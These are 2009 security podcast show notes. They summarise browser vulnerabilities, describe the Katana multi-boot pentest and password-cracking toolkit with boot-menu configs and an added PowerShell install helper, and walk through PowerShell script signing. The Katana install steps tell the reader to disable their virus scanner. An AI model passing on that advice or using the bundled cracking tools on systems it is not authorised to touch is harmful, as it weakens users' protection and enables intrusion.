2009
11.30

ISD Episode 15

InfoSec Daily Podcast

 
Vulnerabilities of Interest:

  1. Microsoft Internet Explorer 8 Cross-Site Scripting Filter Cross-Site Scripting Vulnerability – Microsoft Internet Explorer is prone to a cross-site scripting vulnerability because of a design flaw in the browser’s cross-site scripting filter. An attacker can exploit this issue to execute arbitrary script code in the context of the user running the application and to steal cookie-based authentication credentials and other sensitive data that may aid in further attacks. Internet Explorer 8 is vulnerable.
  2. Mozilla Firefox Remote Memory Corruption Vulnerability – Mozilla Firefox is prone to a remote memory-corruption vulnerability. Successful exploits may allow an attacker to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
  3. Mozilla Firefox and SeaMonkey Download Filename Spoofing Vulnerability – Mozilla Firefox and SeaMonkey are prone to a spoofing vulnerability. Attackers can exploit this issue to spoof the filenames displayed in the download dialog box and trick a user into downloading executable files. Updates are available.
  4. Mozilla Firefox ‘document.getSelect’ Cross Domain Information Disclosure Vulnerability – Mozilla Firefox is prone to a cross-domain information-disclosure vulnerability because the application fails to properly enforce the same-origin policy. An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information that may aid in further attacks.
  5. Microsoft Internet Explorer ‘Style’ Object Remote Code Execution Vulnerability – Microsoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. Failed attacks may cause denial-of-service conditions. Internet Explorer 6 and 7 on Windows XP and Vista are vulnerable; other versions may also be affected.
  6. CA eTrust PestPatrol Anti-Spyware ‘ppctl.dl’ ActiveX Control Remote Buffer Overflow Vulnerability – CA eTrust PestPatrol Anti-Spyware ‘ppctl.dl’ ActiveX control is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
2009
11.27

ISD Special Episode – Katana

InfoSec Daily Podcast

 

Tech Segment:
Hack from a Cave has released Katana, a 5GB portable multi-boot security suite designed to fulfill many of your computer security needs. The idea behind this tool is to bring together many of the best security distributions and applications to run from one USB flash drive. Instead of keeping track of dozens of CDs and DVDs loaded with your favorite security tools, you can keep them all conveniently in your pocket.

Katana includes distributions which focus on Penetration Testing, Auditing, Password Cracking, Forensics and Honey Pots. Katana comes with over 100 portable Windows applications, such as Wireshark, HiJackThis, Unstoppable Copier, Firefox, and OllyDBG. It also includes the following distributions:

* Backtrack 4 pre
* the Ultimate Boot CD
* Ophcrack Live
* Damn Small Linux
* the Ultimate Boot CD for Windows
* Got Root? Slax
* Organizational Systems Wireless Auditor (OSWA) Assistant
* Damn Vulnerable Linux

According to their website: “Ultimate Boot CD is completely free for the download, or could be obtained for a small fee. If you had somehow paid a ridiculous amount of money for it, you have most likely been fleeced. The least you could do is to make as many copies of the official UBCD and pass it to your friends, relatives, colleagues or even complete strangers to minimize the per unit cost of your loss.”

BackTrack is the top-rated Linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-ROM and is fully accessible within minutes.

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

DSL was originally developed as an experiment to see how many usable desktop applications can fit inside a 50MB live CD. It was at first just a personal tool/toy. But over time Damn Small Linux grew into a community project with hundreds of development hours put into refinements including a fully automated remote and local application installation system and a very versatile backup and restore system which may be used with any writable media including a hard drive, a floppy drive, or a USB device.

UBCD4Win is a bootable recovery CD that contains software used for repairing, restoring, or diagnosing almost any computer problem. Their goal is to be the most complete and easy to use free computer diagnostic tool. Almost all software included in UBCD4Win is freeware utilities for Windows®. Some of the tools included are “free for personal use” copies, so users need to respect these licenses. A few of the tools included in UBCD4Win are paid-for, licensed software owned by UBCD4Win.

Got Root? Slax – Developed to accompany Katana. All modules in the “slax/modules” directory were added to Slax 6 excluding those starting with numbers. The modules were obtained from the Slax official website here. The 3-003-desktop.lzm module was unpacked and modified to add the Got Root? Slax wallpaper.

The OSWA-Assistant™ is a freely-downloadable, self-contained, wireless-auditing toolkit for both IT-security professionals and End-users alike.

Damn Vulnerable Linux provides a highly sophisticated training trail, an ideal way to demonstrate your proven excellence in the field of reverse code engineering and hacking across various IT-security knowledge domains, addressing the many challenges of software protection, malware and exploitation analysis.

Katana is also highly customizable. You can modify Katana by adding or removing distributions and portable apps with ease. You can add functionality to distributions like the Ultimate Boot CD, Got Root? Slax and UBCD4Win. You can also load your personal scripts and documents to keep them conveniently on your flash drive to use in concert with the provided tools. You can even use the install script to install Katana on a hard disk. The current boot loader for that disk will be replaced with the syslinux boot loader. The disk must be a FAT32 filesystem.

So what are the requirements for Katana?

1. Requires USB flash drive of size 8GB or larger with 6GB free space. (NOTE: You can install Katana on smaller drives by uninstalling some distributions. See step 4.)

2. Download katana-v1.rar to local disk. Full install requires 6 GB of free disk space on local downloading system. (NOTE: FAT16/FAT32 partitions cannot accommodate a 6GB file.)

3. Flash drive must be formatted FAT32. (OPTIONAL: Create “katana” directory on local disk.)

4. (Turn off your virus scanner before install) Extract katana-v1.rar to the “katana” directory and move to USB flash drive OR extract directly to the root of the flash drive. Now you can run the uninstall_tools.bat or uninstall_tools.sh script in “boot/uninstall/” directory if you wish to remove any distributions. This can also be done after installation.

5. Change directory to the freshly copied /boot directory on the USB device. Make sure you’re in the “boot” directory on the USB device!

6. For Linux/OSX run ./boostinst.sh, for Windows run ./boostinst.bat

7. Make sure computer BIOS allows USB boot. Boot from flash drive.

You want to add another distro to Katana? Adding an operating system to Katana can vary in difficulty. Many Live CD operating systems use isolinux as a bootloader. The USB version of this bootloader is syslinux. If that is the bootloader used by the distribution you wish to install, the following information should help in this task.

1) Extract or burn the operating system image.

2) Create the directory /boot/syslinux/”Distro Name” so that we have a folder for storing the Kon-boot (make sure there are no spaces in the name). Copy the content of the /boot directory from the extracted/burned ISO to this newly created directory.

3) Copy the config file (w/ the .cfg extension) from the /syslinux or /isolinux directory of the extracted/burned ISO to the /boot/menu directory in Katana. Change the name of the config file to “Distro Name”.cfg. Open the “Distro Name”.cfg file with a text editor.

Edit the text following KERNEL and APPEND in the config file. It should look something like the following. Change the path for the kernel and initrd to /boot/syslinux/”distro name”.

For example, change …

LABEL BT4
MENU LABEL FrameBuffer (1024×768)
KERNEL /boot/vmlinuz
APPEND vga=0x317 initrd=/boot/initrd.gz BOOT=casper boot=casper nopersistent rw quiet

to …

LABEL BT4
MENU LABEL FrameBuffer (1024×768)
KERNEL /boot/syslinux/”Distro Name”/vmlinuz
APPEND vga=0x317 initrd=/boot/syslinux/”Distro Name”/initrd.gz BOOT=casper boot=casper nopersistent rw quiet

Also, add the following to the end of the config file.

LABEL back
MENU LABEL ..
KERNEL /boot/vesamenu.c32
APPEND /boot/menus/main.cfg
TEXT HELP
Back to Main Menu
ENDTEXT

4) Now copy the other folders in the root of the CD or extracted image folder to the root of the Katana Drive. (For Backtrack 4 that would be the bt4 directory).

5) Open the main.cfg file in the /boot/syslinux directory. Add the following text to this file. Replace the quoted parts with the appropriate data.

LABEL “Distro Name”
MENU LABEL “Distro Name”
KERNEL /boot/vesamenu.c32
APPEND /boot/menu/”Distro Name”.cfg

Reboot your system and see if it worked.

In addition, you can change the menu format of the distro boot screen to match that of the rest of Katana. The main.cfg controls the format of the menu. You can replace the “…” with the menu content.

DEFAULT /boot/vesamenu.c32
MENU BACKGROUND /boot/wallpaper.png
MENU WIDTH 30
MENU MARGIN 0
MENU ROWS 12
MENU HELPMSGROW 22
MENU TIMEOUTROW 26
MENU TABMSGROW 27
MENU CMDLINEROW 27
MENU HSHIFT 24
MENU VSHIFT 0

menu color screen 37;40 #00000000 #00000000 none
menu color border 30;44 #00000000 #00000000 none
menu color title 1;36;44 #aaaaaaaa #00000000 none
#menu color unsel 37;44 #ff60CA00 #00000000 none
menu color unsel 37;44 #aaaaaaaa #00000000 none
menu color hotkey 1;37;44 #ff60CA00 #00000000 none
#menu color sel 7;37;40 #ffffffff #00000000 none
menu color sel 7;37;40 #ffffffff #00000000 none
menu color hotsel 1;7;37;40 #ff808080 #ff60CA00 none
menu color scrollbar 30;44 #00000000 #00000000 none

menu color tabmsg 31;40 #aaaaaaaa #00000000 none
menu color cmdmark 1;36;40 #ffff0000 #00000000 none
menu color cmdline 37;40 #aaaaaaaa #00000000 none
menu color pwdborder 30;47 #ffff0000 #00000000 std
menu color pwdheader 31;47 #ffff0000 #00000000 std
menu color pwdentry 30;47 #ffff0000 #00000000 std
menu color timeout_msg 37;40 #aaaaaaaa #00000000 none
menu color timeout 1;37;40 #ffaaaaff #00000000 none
menu color help 37;40 #aaaaaa00 #00000000 none
menu color msg07 37;40 #90ffffff #00000000 std

LABEL back
MENU LABEL ..
KERNEL /boot/vesamenu.c32
APPEND /boot/menus/main.cfg
TEXT HELP
Back to Main Menu
ENDTEXT

The menu content generally looks something like:

LABEL …
MENU LABEL …
KERNEL …
APPEND …

Following the instructions provided by ronin, I was able to install Trinity Rescue Kit into Katana.
Trinity Rescue Kit, or TRK, is a free live Linux distribution that aims specifically at recovery and repair operations on Windows machines, but is equally usable for Linux recovery issues. TRK is a completely command-line based distribution, apart from a few tools like qtparted, links, partition image and midnight commander.

1) Download Trinity Rescue Kit ISO from http://trinityhome.org

2) Extract the ISO into a local directory on your system.

3) On your Katana drive, create the file trinity.cfg in the /boot/menu directory. (This is the menu for Trinity Rescue Kit.) Open trinity.cfg in a text editor and copy and paste the following into it:

PROMPT 0
#TIMEOUT 90
DEFAULT /boot/vesamenu.c32
MENU BACKGROUND /boot/wallpaper.png

MENU WIDTH 60
MENU MARGIN 0
MENU ROWS 10
MENU HELPMSGROW 22
MENU TIMEOUTROW 26
MENU TABMSGROW 27
MENU CMDLINEROW 27
MENU HSHIFT 9
MENU VSHIFT 0

menu color screen 37;40 #00000000 #00000000 none
menu color border 30;44 #00000000 #00000000 none
menu color title 1;36;44 #aaaaaaaa #00000000 none
#menu color unsel 37;44 #ff60CA00 #00000000 none
menu color unsel 37;44 #aaaaaaaa #00000000 none
menu color hotkey 1;37;44 #ff60CA00 #00000000 none
#menu color sel 7;37;40 #ffffffff #00000000 none
menu color sel 7;37;40 #ffffffff #00000000 none
menu color hotsel 1;7;37;40 #ff808080 #ff60CA00 none
menu color scrollbar 30;44 #00000000 #00000000 none

menu color tabmsg 31;40 #aaaaaaaa #00000000 none
menu color cmdmark 1;36;40 #ffff0000 #00000000 none
menu color cmdline 37;40 #aaaaaaaa #00000000 none
menu color pwdborder 30;47 #ffff0000 #00000000 std
menu color pwdheader 31;47 #ffff0000 #00000000 std
menu color pwdentry 30;47 #ffff0000 #00000000 std
menu color timeout_msg 37;40 #aaaaaaaa #00000000 none
menu color timeout 1;37;40 #ffaaaaff #00000000 none
menu color help 37;40 #aaaaaa00 #00000000 none
menu color msg07 37;40 #90ffffff #00000000 std

MENU TITLE Trinity Rescue Disk

LABEL trk3
MENU label TRD – default
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1

LABEL 1
MENU label TRD – as bootserver to boot other TRK clients
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 trkbootnet

LABEL 2
MENU label TRD – running from RAM (best >= 512mb, 256mb min)
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 trkinmem

LABEL 3
MENU label TRD – with bigger screenfont
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 normalfont

LABEL 4
MENU label TRD – in simple VGA mode (debugging of kernel output)
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=1 pci=conf1 splash=off

LABEL 5
MENU label TRD – with Belgian keyboard (see docs for other)
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 keyb_be

LABEL 6
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Virusscan all drives (non interactive)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 virusscan

LABEL 7
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Try more pcmcia and usb nics (when not detected)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 pcmcia

LABEL 8
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Try more SCSI drivers (when disks not detected)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 scsidrv

LABEL 9
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – with a secure shell server enabled
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 sshd

LABEL 10
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Execute local scripts on harddrive of PC
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 locscr

LABEL 11
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Fileshare all drives, secured with user
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 smbsec

LABEL 12
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Fileshare all drives as guest, no security
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 smbguest

LABEL 0
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Single user mode
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 runlevel 1

LABEL noacpi
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Acpi=off, noapic PCI=bios (Alternate boot 1)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose acpi=off noapic pci=bios

LABEL pcinormal
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Acpi=off, noapic PCI=any (Alternate boot 2)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose acpi=off noapic

LABEL pciconf1
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – PCI=conf2 (Alternate boot 3)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf2

LABEL debug
MENU label TRD – Verbose startup for debugging after initial bootfase
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 debugging

LABEL 18
MENU label TRD – SSH server and run from RAM
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 sshd trkinmem

LABEL 19
MENU label TRD – SSH server, run from RAM, act as a secure fileserver
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 sshd trkinmem smbsec

LABEL 20
MENU label TRD – proxyserver support enabled
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 proxy

LABEL back
MENU LABEL ..
KERNEL /boot/vesamenu.c32
APPEND /boot/menus/main.cfg
TEXT HELP
Back to Main Menu
ENDTEXT

4) Create the directory /boot/syslinux/trinity in Katana. Copy the kernel.trk and initrd.trk files into the newly created directory from the extracted ISO.

5) Copy the /trk3 directory from the extracted ISO to the root of Katana.

6) Finally, on the Katana drive, open /boot/menus/main.cfg in a text editor and add the following to the end of the file. This will add Trinity Rescue Kit to the main boot menu.

LABEL trinity
MENU LABEL Trinity Rescue Kit
KERNEL /boot/vesamenu.c32
APPEND /boot/menus/trinity.cfg
TEXT HELP
More about currently selected:

Trinity Rescue Kit is a distribution
that aims specifically at recovery
and repair operations.
ENDTEXT

You should now be able to boot Trinity Rescue Kit from Katana.
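As an added example (not part of Katana or these notes), the following PowerShell script automates steps 2 to 5 of the generic “add another distro” procedure above, of which the Trinity Rescue Kit walkthrough is one instance. It assumes Katana’s menus live under /boot/menus (the directory the APPEND lines above point at) and that the distro’s own isolinux or syslinux config uses absolute paths such as KERNEL /boot/vmlinuz and initrd=/boot/initrd.gz, as in the BackTrack 4 example; the drive letter, ISO folder and name are whatever you pass in.

```powershell
# Added example, not part of Katana or the podcast notes. Automates steps 2-5 of the
# "add another distro" procedure for a distro that boots with isolinux/syslinux.
# Assumptions: Katana's menus live under /boot/menus (as the APPEND lines in the notes show),
# and the distro's own .cfg uses absolute paths such as KERNEL /boot/vmlinuz and
# initrd=/boot/initrd.gz (the BackTrack 4 layout shown in the notes).
param(
    [Parameter(Mandatory = $true)] [string]$KatanaRoot,    # e.g. E:\ (the FAT32 flash drive)
    [Parameter(Mandatory = $true)] [string]$ExtractedIso,  # folder holding the extracted ISO
    [Parameter(Mandatory = $true)] [string]$Name,          # short name, no spaces, e.g. bt4
    [string]$MenuTitle = $Name                             # text shown in Katana's main menu
)

if ($Name -match '\s') { throw "Distro name '$Name' must not contain spaces." }

$target  = Join-Path $KatanaRoot "boot\syslinux\$Name"
$menuDir = Join-Path $KatanaRoot 'boot\menus'
$menuCfg = Join-Path $menuDir "$Name.cfg"
$mainCfg = Join-Path $menuDir 'main.cfg'

# Step 2: /boot/syslinux/<name> receives the distro's own /boot content.
New-Item -ItemType Directory -Path $target -Force | Out-Null
Copy-Item -Path (Join-Path $ExtractedIso 'boot\*') -Destination $target -Recurse -Force

# Step 3: take the distro's isolinux/syslinux .cfg, repoint KERNEL and initrd= at the new
# directory, append the "back to main menu" entry, and save it as /boot/menus/<name>.cfg.
$srcCfg = Get-ChildItem -Path (Join-Path $ExtractedIso 'isolinux'), (Join-Path $ExtractedIso 'syslinux') `
    -Filter *.cfg -ErrorAction SilentlyContinue | Select-Object -First 1
if (-not $srcCfg) { throw "No isolinux or syslinux .cfg found under $ExtractedIso" }

$lines = @(Get-Content -Path $srcCfg.FullName | ForEach-Object {
    $_ -replace '(?i)^(\s*KERNEL\s+)/boot/', "`$1/boot/syslinux/$Name/" `
       -replace '(?i)initrd=/boot/', "initrd=/boot/syslinux/$Name/"
})
$lines += @('', 'LABEL back', 'MENU LABEL ..', 'KERNEL /boot/vesamenu.c32',
            'APPEND /boot/menus/main.cfg', 'TEXT HELP', 'Back to Main Menu', 'ENDTEXT')
Set-Content -Path $menuCfg -Value $lines

# Step 4: the remaining folders from the ISO root (e.g. bt4 for BackTrack 4) go to the drive root.
Get-ChildItem -Path $ExtractedIso |
    Where-Object { @('boot', 'isolinux', 'syslinux') -notcontains $_.Name } |
    Copy-Item -Destination $KatanaRoot -Recurse -Force

# Step 5: add the entry that opens the new sub-menu from Katana's main menu.
Add-Content -Path $mainCfg -Value @('', "LABEL $Name", "MENU LABEL $MenuTitle",
    'KERNEL /boot/vesamenu.c32', "APPEND /boot/menus/$Name.cfg")
Write-Host "Added $Name to Katana; reboot from the flash drive to test it."
```

Run it as, for example, `.\Add-KatanaDistro.ps1 -KatanaRoot E:\ -ExtractedIso C:\iso\bt4 -Name bt4 -MenuTitle "BackTrack 4"`, then check /boot/menus/bt4.cfg by hand before rebooting.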

You can download Katana v1 here: http://www.hackfromacave.com/katana.html

2009
11.26

InfoSec Daily Podcast

 

Welcome to the InfoSec Podcast Special Technical Segment on PowerShell Signing. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news and review useful tools that will hopefully provide you a few laughs and a little knowledge.

What is code signing? Code signing is the process of digitally signing files to confirm the author and guarantee that the file has not been altered or corrupted. It’s essentially the same as signing emails: it guarantees that they were actually authored by the person claiming to be the author, and that they weren’t changed after the author signed them. (For more information see Apple’s explanation and Microsoft’s).

How does digital signing work? A digital signature scheme typically consists of three algorithms:

  • A key generation algorithm that selects a private key uniformly at random from a set of possible private keys. The algorithm outputs the private key and a corresponding public key.
  • A signing algorithm which, given a message and a private key, produces a signature.
  • A signature verifying algorithm which given a message, public key and a signature, either accepts or rejects the message’s claim to authenticity.

Two main properties are required. First, a signature generated from a fixed message and fixed private key should verify the authenticity of that message by using the corresponding public key. Secondly, it should be computationally infeasible to generate a valid signature for a party who does not possess the private key.

With public/private key encryption, data encrypted with the private key can be decrypted with the public key. So the hash of the file, encrypted with the private key (and sometimes the public key as well), is attached to the file, and the end user can recalculate the hash and decrypt the signature to verify: a) that it was encrypted by the private key belonging to the author, and b) that the hash matches the hash that the author signed.

What’s all this about keys?

In a Public Key Infrastructure (PKI), the “key” is actually included in an SSL certificate issued to you by a Certificate Authority (CA) who verifies your identity. Verisign introduced the idea of “classes” for certificates, and you can now get free Class 1 certificates for email signing from most CAs (like Thawte), where the only thing they verify is that the person being issued the certificate can send and receive email at that address.

Of course, if you want to be verified as the author of code, users want to know more about you than your email address. So to sign code, you need at least a Class 2 certificate, for which proof of identity is required. This typically comes in the form of providing (photos of) your passport, driver’s license and/or other photo ID to verify that you are who you claim to be, and answering a few questions on the phone to validate that you own the phone number provided… or providing tax or other documents to prove the existence of an organization and that you’re qualified to speak for them. There are also additional classes: Class 3, 4, and 5 are extended validation certificates used for servers, software signing, b2b transactions and government security.

Why should I sign PowerShell scripts?

Reality is that you probably don’t need to do so unless you want to provide a mechanism that your code can be verified and was delivered unaltered.  Code-signing gives you a way to do just that by locking down and securing PowerShell scripts.

As an individual, signing doesn’t offer you much unless you share your computer with other administrator users. After all, what it protects you from is intentional or accidental altering of the script. If there’s no one else who has access to your computer, then nobody can alter your scripts.

Of course, if you distribute your scripts, signing them gives you (and your users) the assurance that you are the author and that no one has altered your script. The main items to take away are that code signing cannot guarantee that code is free of security vulnerabilities, and it doesn’t guarantee that a script doesn’t load unsafe code or perform unsafe actions during execution.

Assuming that you still want to try signing your scripts, you need a certificate. You can get one from a public Certificate Authority or from an internal Certificate Authority.

The third option for obtaining a code-signing certificate is to make your own self-signed certificate using a tool like Makecert.exe. It ships with the Windows Platform SDK. The upside of a self-signed certificate is that it’s free and doesn’t require any infrastructure. The downside, however, is that it’s really only usable on your computer. But if you just need to enable script execution on your computer—for testing or general experimentation with code signing—Makecert.exe is a great option. Documentation about this tool is at go.microsoft.com/fwlink/?LinkId=108538. Just be aware that many versions of this tool have existed over the years, so it’s possible that your computer is running an older version that doesn’t work exactly as the documentation describes.  For example, for Windows 7 you’ll need the Microsoft Windows SDK for Windows 7 and .NET Framework 3.5 SP1.  http://www.microsoft.com/downloads/details.aspx?FamilyID=c17ba869-9671-4330-a63e-1fd44e0e2505&displaylang=en

Once you have Makecert.exe, you can create a self-signed certificate. First we want to ensure that PowerShell is working by running something like the following from the Windows PowerShell command line:

PS C:\Program Files\Microsoft SDKs\Windows\v7.0\bin> type .\script.ps1
[system.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces() |
Where-Object { $_.GetIPProperties().GatewayAddresses } |
ForEach-Object {
$_.GetIPProperties().UnicastAddresses| ForEach-Object {
$_.Address.IPAddressToString
}
}

PS C:\Program Files\Microsoft SDKs\Windows\v7.0\bin> .\script.ps1
fe80::c89c:9d2c:15ac:1b87%11
10.25.0.99
fe80::681b:b2c1:bab0:70d5%18
192.168.193.1
fe80::d936:3768:d735:ab%20
192.168.85.1

PS C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin> .\makecert -n "CN=PowerShell Local Certificate Root" -a sha1 -eku 1.3.6.1.5.5.7.3.3 -r -sv root.pvk root.cer -ss Root -sr localMachine
Succeeded

You will be prompted to set a password for the private key, and then prompted again to enter the password you just set.

Now run the following from a Command Prompt.  It generates a personal certificate from the above certificate authority:

C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin>makecert -pe -n "CN=PowerShell User" -ss MY -a sha1 -eku 1.3.6.1.5.5.7.3.3 -iv root.pvk -ic root.cer
Succeeded

You’ll be prompted for the private key password you entered earlier.

This places the self-signed certificate into your personal store.

Now you need to verify from PowerShell that the certificate was generated correctly:

PS C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin> Get-ChildItem cert:\CurrentUser\My -codesign

Directory: Microsoft.PowerShell.Security\Certificate::CurrentUser\My

Thumbprint                                Subject
----------                                -------
55C746A509308332B66C9CFEE1011F9F64679671  CN=PowerShell User

You can now delete the two temporary files root.pvk and root.cer in your working directory. The certificate info is stored with that of others, in “C:\Documents and Settings\[username]\Application Data\Microsoft\SystemCertificates\My\”.

Signing a Script
Now that you’ve got a certificate and you’ve got a script (for testing purposes, you can just make one up quickly, if you need to), you’re ready to sign the script. First we want to demonstrate what it looks like when you don’t have a signed script or when the Execution Policy requires that the script is signed. We do this by using the Set-ExecutionPolicy AllSigned command.

PS C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin> Set-ExecutionPolicy AllSigned

Now we can try to run our unsigned script.
PS C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin> .\script.ps1
File C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin\script.ps1 cannot be loaded. The file C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin\script.ps1 is not digitally signed. The script will not execute on the system. Please see "get-help about_signing" for more details..
At line:1 char:13
+ .\script.ps1 <<<<
+ CategoryInfo          : NotSpecified: (:) [], PSSecurityException
+ FullyQualifiedErrorId : RuntimeException

Now we’re going to sign our script:

PS C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin> Set-AuthenticodeSignature script.ps1 @(Get-ChildItem cert:\CurrentUser\My -codesigning)[0]

Directory: C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin

SignerCertificate                         Status             Path
-----------------                         ------             ----
55C746A509308332B66C9CFEE1011F9F64679671  Valid              script.ps1

This actually modifies the end of the script with a signature block.  Now open that script and you’ll see the signature block inserted at the bottom. Try running the script with your execution policy set to AllSigned (Set-ExecutionPolicy AllSigned) and it should work fine. Now you’ll want to modify the script and save it, but make sure you don’t sign it again. Windows PowerShell should now simply refuse to run the modified version because the signature has been broken.

[system.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces() |
Where-Object { $_.GetIPProperties().GatewayAddresses } |
ForEach-Object {
$_.GetIPProperties().UnicastAddresses| ForEach-Object {
$_.Address.IPAddressToString
}
}
# SIG # Begin signature block
# MIIEMwYJKoZIhvcNAQcCoIIEJDCCBCACAQExCzAJBgUrDgMCGgUAMGkGCisGAQQB
# gjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR
# AgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQUMMk7EB96aq7RuaYVZtINR/9P
# bz+gggI9MIICOTCCAaagAwIBAgIQ9GUKJXkjfrFHX4HNvUBqfTAJBgUrDgMCHQUA
# MCwxKjAoBgNVBAMTIVBvd2VyU2hlbGwgTG9jYWwgQ2VydGlmaWNhdGUgUm9vdDAe
# Fw0wOTExMjEwMDQxNTZaFw0zOTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMTD1Bvd2Vy
# U2hlbGwgVXNlcjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAkb4oawAASvMB
# rQ9hLSqaIJMPplCJG8Xh+RYLKL867zEGKtk1M83A+s4+KqFyall9iD8wex9WaUjH
# CQE7K71lsuprJDnAYIwgaxEVoIhMDtXSt5BiKcZdwUFTMHkUppeage9Qx+uR+JXe
# FTPydvus663IEM7t8dROq921/e37KNsCAwEAAaN2MHQwEwYDVR0lBAwwCgYIKwYB
# BQUHAwMwXQYDVR0BBFYwVIAQE43DypIlBMHL15nDtPUsuaEuMCwxKjAoBgNVBAMT
# IVBvd2VyU2hlbGwgTG9jYWwgQ2VydGlmaWNhdGUgUm9vdIIQk7Dn3ps5vaxAUlAJ
# +ZsNSDAJBgUrDgMCHQUAA4GBAFSWkZjKM5j2UyWVkt4egwEyCi9PfzMOU7H38OD9
# KmCdSPFdFwmAfnvTfRiYNJxfCtIy5cRE/tnTqAImXaHeBwMJNGKSHl0a8L2uACni
# mL4FKgL1C+AqBpDkxGmRc0WVTE6w1yQYzqTEpsQPEXWqH+nxTa3juleCw8A8l2+5
# 39uzMYIBYDCCAVwCAQEwQDAsMSowKAYDVQQDEyFQb3dlclNoZWxsIExvY2FsIENl
# cnRpZmljYXRlIFJvb3QCEPRlCiV5I36xR1+Bzb1Aan0wCQYFKw4DAhoFAKB4MBgG
# CisGAQQBgjcCAQwxCjAIoAKAAKECgAAwGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcC
# AQQwHAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwIwYJKoZIhvcNAQkEMRYE
# FHE6mEEs43d776HA5FWueAQRh5arMA0GCSqGSIb3DQEBAQUABIGAVvKHltzyIKsG
